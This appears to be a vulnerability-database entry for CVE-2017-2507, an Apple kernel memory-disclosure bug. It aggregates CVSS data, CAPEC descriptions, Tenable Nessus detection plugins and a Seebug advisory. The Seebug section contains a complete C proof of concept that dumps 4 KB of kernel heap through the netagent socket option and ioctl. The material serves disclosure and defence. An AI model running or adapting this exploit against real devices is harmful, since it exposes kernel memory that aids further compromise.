Vulnerabilities > CVE-2017-2507 - Information Exposure vulnerability in Apple products

047910
CVSS 4.3 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
apple
CWE-200
nessus

Summary

An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. tvOS before 10.2.1 is affected. watchOS before 3.2.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.

Vulnerable Configurations

Part Description Count
OS
Apple
326

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
  • Footprinting
    An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Browser Fingerprinting
    An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
  • Session Credential Falsification through Prediction
    This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

Nessus

  • NASL familyMisc.
    NASL idAPPLETV_10_2_1.NASL
    descriptionAccording to its banner, the version of Apple TV on the remote device is prior to 10.2.1. It is, therefore, affected by multiple vulnerabilities : - A memory corruption issue exists in the WebKit Web Inspector component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-2499) - An unspecified race condition exists in the Kernel component that allows a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-2501) - An information disclosure vulnerability exists in the CoreAudio component due to improper sanitization of certain input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2502) - A universal cross-site scripting (XSS) vulnerability exists in WebKit due to a logic flaw when handling WebKit Editor commands. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary script code in a user
    last seen2020-06-01
    modified2020-06-02
    plugin id100256
    published2017-05-17
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100256
    titleApple TV < 10.2.1 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(100256);
      script_version("1.9");
      script_cvs_date("Date: 2019/11/13");
    
      script_cve_id(
        "CVE-2017-2499",
        "CVE-2017-2501",
        "CVE-2017-2502",
        "CVE-2017-2504",
        "CVE-2017-2505",
        "CVE-2017-2507",
        "CVE-2017-2513",
        "CVE-2017-2515",
        "CVE-2017-2518",
        "CVE-2017-2519",
        "CVE-2017-2520",
        "CVE-2017-2521",
        "CVE-2017-2524",
        "CVE-2017-2525",
        "CVE-2017-2530",
        "CVE-2017-2531",
        "CVE-2017-2536",
        "CVE-2017-2549",
        "CVE-2017-6979",
        "CVE-2017-6980",
        "CVE-2017-6984",
        "CVE-2017-6987",
        "CVE-2017-6989",
        "CVE-2017-7003",
        "CVE-2017-7005"
      );
      script_bugtraq_id(
        98454,
        98455,
        98456,
        98457,
        98468,
        98473
      );
    
      script_name(english:"Apple TV < 10.2.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the build number.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote Apple TV device is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its banner, the version of Apple TV on the remote device
    is prior to 10.2.1. It is, therefore, affected by multiple
    vulnerabilities :
    
      - A memory corruption issue exists in the WebKit Web
        Inspector component that allows an unauthenticated,
        remote attacker to execute arbitrary code.
        (CVE-2017-2499)
    
      - An unspecified race condition exists in the Kernel
        component that allows a local attacker to execute
        arbitrary code with kernel-level privileges.
        (CVE-2017-2501)
    
      - An information disclosure vulnerability exists in the
        CoreAudio component due to improper sanitization of
        certain input. A local attacker can exploit this to read
        the contents of restricted memory. (CVE-2017-2502)
    
      - A universal cross-site scripting (XSS) vulnerability
        exists in WebKit due to a logic flaw when handling
        WebKit Editor commands. An unauthenticated, remote
        attacker can exploit this, via a specially crafted web
        page, to execute arbitrary script code in a user's
        browser session. (CVE-2017-2504)
    
      - Multiple memory corruption issues exist in WebKit due to
        improper validation of certain input. An
        unauthenticated, remote attacker can exploit these to
        execute arbitrary code. (CVE-2017-2505, CVE-2017-2515,
        CVE-2017-2521, CVE-2017-2530, CVE-2017-2531,
        CVE-2017-6980, CVE-2017-6984)
    
      - Multiple information disclosure vulnerabilities exist
        in the Kernel component due to improper sanitization of
        certain input. A local attacker can exploit these to
        read the contents of restricted memory. (CVE-2017-2507,
        CVE-2017-6987)
    
      - A use-after-free error exists in the SQLite component
        when handling SQL queries. An unauthenticated, remote
        attacker can exploit this to deference already freed
        memory, resulting in the execution of arbitrary code.
        (CVE-2017-2513)
    
      - Multiple buffer overflow conditions exist in the SQLite
        component due to the improper validation of certain
        input. An unauthenticated, remote attacker can exploit
        these, via a specially crafted SQL query, to execute
        arbitrary code. (CVE-2017-2518, CVE-2017-2520)
    
      - A memory corruption issue exists in the SQLite component
        when handling SQL queries. An unauthenticated, remote
        attacker can exploit this, via a specially crafted
        query, to execute arbitrary code. (CVE-2017-2519)
    
      - An unspecified memory corruption issue exists in the
        TextInput component when parsing specially crafted data.
        An unauthenticated, remote attacker can exploit this to
        execute arbitrary code. (CVE-2017-2524)
    
      - A use-after-free error exists in WebKit when handling
        RenderLayer objects. An unauthenticated, remote attacker
        can exploit this, via a specially crafted web page, to
        deference already freed memory, resulting in the
        execution of arbitrary code. (CVE-2017-2525)
    
      - Multiple unspecified flaws exist in WebKit that allow
        an unauthenticated, remote attacker to corrupt memory
        and execute arbitrary code by using specially crafted
        web content. (CVE-2017-2536)
    
      - A universal cross-site scripting (XSS) vulnerability
        exists in WebKit due to a logic error when handling
        frame loading. An unauthenticated, remote attacker can
        exploit this, via a specially crafted web page, to
        execute arbitrary code in a user's browser session.
        (CVE-2017-2549)
    
      - An unspecified flaw exists in the IOSurface component
        that allows a local attacker to corrupt memory and
        execute arbitrary code with kernel-level privileges.
        (CVE-2017-6979)
    
      - An unspecified flaw exists in the AVEVideoEncoder
        component that allows a local attacker, via a specially
        crafted application, to corrupt memory and execute
        arbitrary code with kernel-level privileges.
        (CVE-2017-6989)
    
      - A denial of service vulnerability exists in the
        CoreText component due to improper validation of
        user-supplied input. An unauthenticated, remote attacker
        can exploit this, via a specially crafted file, to crash
        an application. (CVE-2017-7003)
    
      - A memory corruption issue exists in the JavaScriptCore
        component due to improper validation of user-supplied
        input. An unauthenticated, remote attacker can exploit
        this, via specially crafted web content, to cause a
        denial of service condition or the execution of
        arbitrary code. (CVE-2017-7005)
    
    Note that only 4th generation models are affected by these
    vulnerabilities.");
      script_set_attribute(attribute:"see_also", value:"https://support.apple.com/en-us/HT207801");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Apple TV version 10.2.1 or later. Note that this update is
    only available for 4th generation models.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-6989");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/15");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/05/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/17");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apple:apple_tv");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("appletv_version.nasl");
      script_require_keys("AppleTV/Version", "AppleTV/Model", "AppleTV/URL", "AppleTV/Port");
      script_require_ports("Services/www", 7000);
    
      exit(0);
    }
    
    include("audit.inc");
    include("appletv_func.inc");
    
    url = get_kb_item('AppleTV/URL');
    if (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');
    port = get_kb_item('AppleTV/Port');
    if (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');
    
    build = get_kb_item('AppleTV/Version');
    if (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');
    
    model = get_kb_item('AppleTV/Model');
    if (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');
    
    fixed_build = "14W585a";
    tvos_ver = '10.2.1';
    
    # determine gen from the model
    gen = APPLETV_MODEL_GEN[model];
    
    appletv_check_version(
      build          : build,
      fix            : fixed_build,
      affected_gen   : 4,
      fix_tvos_ver   : tvos_ver,
      model          : model,
      gen            : gen,
      port           : port,
      url            : url,
      severity       : SECURITY_HOLE,
      xss            : TRUE
    );
    
  • NASL familyMacOS X Local Security Checks
    NASL idMACOS_10_12_5.NASL
    descriptionThe remote host is running a version of macOS that is 10.12.x prior to 10.12.5. It is, therefore, affected by multiple vulnerabilities : - Multiple memory corruption issues exist in the Kernel component that allow a local attacker to gain kernel-level privileges. (CVE-2017-2494, CVE-2017-2546) - A state management flaw exists in the iBooks component due to improper handling of URLs. An unauthenticated, remote attacker can exploit this, via a specially crafted book, to open arbitrary websites without user permission. (CVE-2017-2497) - A local privilege escalation vulnerability exists in the Kernel component due to a race condition. A local attacker can exploit this to execute arbitrary code with kernel-level privileges. (CVE-2017-2501) - An information disclosure vulnerability exists in the CoreAudio component due to improper sanitization of user-supplied input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2502) - A memory corruption issue exists in the Intel graphics driver component that allows a local attacker to execute arbitrary code with kernel-level privileges. CVE-2017-2503) - Multiple information disclosure vulnerabilities exist in the Kernel component due to improper sanitization of user-supplied input. A local attacker can exploit these to read the contents of restricted memory. (CVE-2017-2507, CVE-2017-2509, CVE-2017-2516, CVE-2017-6987) - A memory corruption issue exists in the Sandbox component that allows an unauthenticated, remote attacker to escape an application sandbox. (CVE-2017-2512) - A use-after-free error exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2513) - Multiple buffer overflow conditions exist in the SQLite component due to the improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted SQL query, to execute arbitrary code. (CVE-2017-2518, CVE-2017-2520) - A memory corruption issue exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this, via a specially crafted SQL query, to execute arbitrary code. (CVE-2017-2519) - An unspecified memory corruption issue exists in the TextInput component when parsing specially crafted data. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2524) - A flaw exists in the CoreAnimation component when handling specially crafted data. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2527) - A race condition exists in the DiskArbitration feature that allow a local attacker to gain system-level privileges. (CVE-2017-2533) - An unspecified flaw exists in the Speech Framework that allows a local attacker to escape an application sandbox. (CVE-2017-2534) - A resource exhaustion issue exists in the Security component due to improper validation of user-supplied input. A local attacker can exploit this to exhaust resources and escape an application sandbox. (CVE-2017-2535) - Multiple memory corruption issues exist in the WindowServer component that allow a local attacker to execute arbitrary code with system-level privileges. (CVE-2017-2537, CVE-2017-2548) - An information disclosure vulnerability exists in WindowServer component in the _XGetConnectionPSN() function due to improper validation of user-supplied input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2540) - A stack-based buffer overflow condition exists in the WindowServer component in the _XGetWindowMovementGroup() function due to improper validation of user-supplied input. A local attacker can exploit this to execute arbitrary code with the privileges of WindowServer. (CVE-2017-2541) - Multiple memory corruption issues exist in the Multi-Touch component that allow a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-2542, CVE-2017-2543) - A use-after-free error exists in the IOGraphic component that allows a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-2545) - A flaw exists in the Speech Framework, specifically within the speechsynthesisd service, due to improper validation of unsigned dynamic libraries (.dylib) before being loaded. A local attacker can exploit this to bypass the application
    last seen2020-06-01
    modified2020-06-02
    plugin id100270
    published2017-05-18
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100270
    titlemacOS 10.12.x < 10.12.5 Multiple Vulnerabilities

Seebug

bulletinFamilyexploit
descriptioniOS/MacOS kernel memory disclosure due to lack of bounds checking in netagent socket option handling netagent_ctl_setopt is the setsockopt handler for netagent control sockets. Options of type NETAGENT_OPTION_TYPE_REGISTER are handled by netagent_handle_register_setopt. Here's the code: ``` static errno_t netagent_handle_register_setopt(struct netagent_session *session, u_int8_t *payload, u_int32_t payload_length) { int data_size = 0; struct netagent_wrapper *new_wrapper = NULL; u_int32_t response_error = 0; struct netagent *register_netagent = (struct netagent *)(void *)payload; <----------- (a) if (session == NULL) { NETAGENTLOG0(LOG_ERR, "Failed to find session"); response_error = EINVAL; goto done; } if (payload == NULL) { NETAGENTLOG0(LOG_ERR, "No payload received"); response_error = EINVAL; goto done; } if (session->wrapper != NULL) { NETAGENTLOG0(LOG_ERR, "Session already has a registered agent"); response_error = EINVAL; goto done; } if (payload_length < sizeof(struct netagent)) { <----------- (b) NETAGENTLOG(LOG_ERR, "Register message size too small for agent: (%d < %d)", payload_length, sizeof(struct netagent)); response_error = EINVAL; goto done; } data_size = register_netagent->netagent_data_size; if (data_size < 0 || data_size > NETAGENT_MAX_DATA_SIZE) { <----------- (c) NETAGENTLOG(LOG_ERR, "Register message size could not be read, data_size %d", data_size); response_error = EINVAL; goto done; } MALLOC(new_wrapper, struct netagent_wrapper *, sizeof(*new_wrapper) + data_size, M_NETAGENT, M_WAITOK); if (new_wrapper == NULL) { NETAGENTLOG0(LOG_ERR, "Failed to allocate agent"); response_error = ENOMEM; goto done; } memset(new_wrapper, 0, sizeof(*new_wrapper) + data_size); memcpy(&new_wrapper->netagent, register_netagent, sizeof(struct netagent) + data_size); <------------ (d) response_error = netagent_handle_register_inner(session, new_wrapper); if (response_error != 0) { FREE(new_wrapper, M_NETAGENT); goto done; } NETAGENTLOG0(LOG_DEBUG, "Registered new agent"); netagent_post_event(new_wrapper->netagent.netagent_uuid, KEV_NETAGENT_REGISTERED, TRUE); done: return response_error; } ``` The payload and payload_length arguments are the socket option buffer which has be copied in to the kernel. At (a) this is cast to a struct netagent and at (b) it's checked whether the payload is big enough to contain this structure. Then at (c) an int read from the buffer is compared against a lower and upper bound and then used at (d) as the size of data to copy from inside the payload buffer. It's not checked that the payload buffer is actually big enough to contain data_size bytes of data though. This oob data can then be retreived by userspace via the SIOCGIFAGENTDATA64 ioctl. This poc will dump 4k of kernel heap. Tested on MacOS 10.12.3 (16D32) on MacBookPro10,1 ``` #include <errno.h> #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/kern_control.h> #include <sys/sys_domain.h> #include <net/if.h> #include <netinet/in_var.h> #include <netinet6/nd6.h> #include <arpa/inet.h> #include <sys/ioctl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int ctl_open(char* control_name) { int sock; int error = 0; struct ctl_info kernctl_info; struct sockaddr_ctl kernctl_addr; sock = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL); if (sock < 0) { printf("failed to open a SYSPROTO_CONTROL socket: %s\n", strerror(errno)); goto done; } memset(&kernctl_info, 0, sizeof(kernctl_info)); strlcpy(kernctl_info.ctl_name, control_name, sizeof(kernctl_info.ctl_name)); error = ioctl(sock, CTLIOCGINFO, &kernctl_info); if (error) { printf("Failed to get the control info for control named \"%s\": %s\n", control_name, strerror(errno)); goto done; } memset(&kernctl_addr, 0, sizeof(kernctl_addr)); kernctl_addr.sc_len = sizeof(kernctl_addr); kernctl_addr.sc_family = AF_SYSTEM; kernctl_addr.ss_sysaddr = AF_SYS_CONTROL; kernctl_addr.sc_id = kernctl_info.ctl_id; kernctl_addr.sc_unit = 0; error = connect(sock, (struct sockaddr *)&kernctl_addr, sizeof(kernctl_addr)); if (error) { printf("Failed to connect to the control socket: %s\n", strerror(errno)); goto done; } done: if (error && sock >= 0) { close(sock); sock = -1; } return sock; } #define NETAGENT_OPTION_TYPE_REGISTER 1 #define NETAGENT_DOMAINSIZE 32 #define NETAGENT_TYPESIZE 32 #define NETAGENT_DESCSIZE 128 struct netagent_req64 { uuid_t netagent_uuid; char netagent_domain[NETAGENT_DOMAINSIZE]; char netagent_type[NETAGENT_TYPESIZE]; char netagent_desc[NETAGENT_DESCSIZE]; u_int32_t netagent_flags; u_int32_t netagent_data_size; uint64_t netagent_data __attribute__((aligned(8))); }; struct netagent { uuid_t netagent_uuid; char netagent_domain[NETAGENT_DOMAINSIZE]; char netagent_type[NETAGENT_TYPESIZE]; char netagent_desc[NETAGENT_DESCSIZE]; u_int32_t netagent_flags; u_int32_t netagent_data_size; u_int8_t netagent_data[0]; }; #define SIOCGIFAGENTDATA64 _IOWR('i', 168, struct netagent_req64) int main(){ int fd = ctl_open("com.apple.net.netagent"); if (fd < 0) { printf("failed to get control socket :(\n"); return 1; } printf("got a control socket! %d\n", fd); struct netagent na = {0}; na.netagent_uuid[0] = 123; na.netagent_data_size = 4096; int err = setsockopt(fd, SYSPROTO_CONTROL, NETAGENT_OPTION_TYPE_REGISTER, &na, sizeof(na)); if (err == -1) { perror("setsockopt failed"); return 0; } else { printf("set the option!\n"); } uint64_t* buf = malloc(4096); memset(buf, 0, 4096); struct netagent_req64 req = {0}; req.netagent_uuid[0] = 123; req.netagent_data_size = 4096; req.netagent_data = (uint64_t)buf; err = ioctl(fd, SIOCGIFAGENTDATA64, &req); if (err == -1) { perror("get getinterface agent data failed"); }else { printf("got something?\n"); for (int i = 0; i < 4096/8; i++) { printf("%016llx\n", buf[i]); } } return 0; } ```
idSSV:93155
last seen2017-11-19
modified2017-05-27
published2017-05-27
reporterRoot
titleApple iOS / MacOS Netagent Kernel Memory Disclosure(CVE-2017-2507)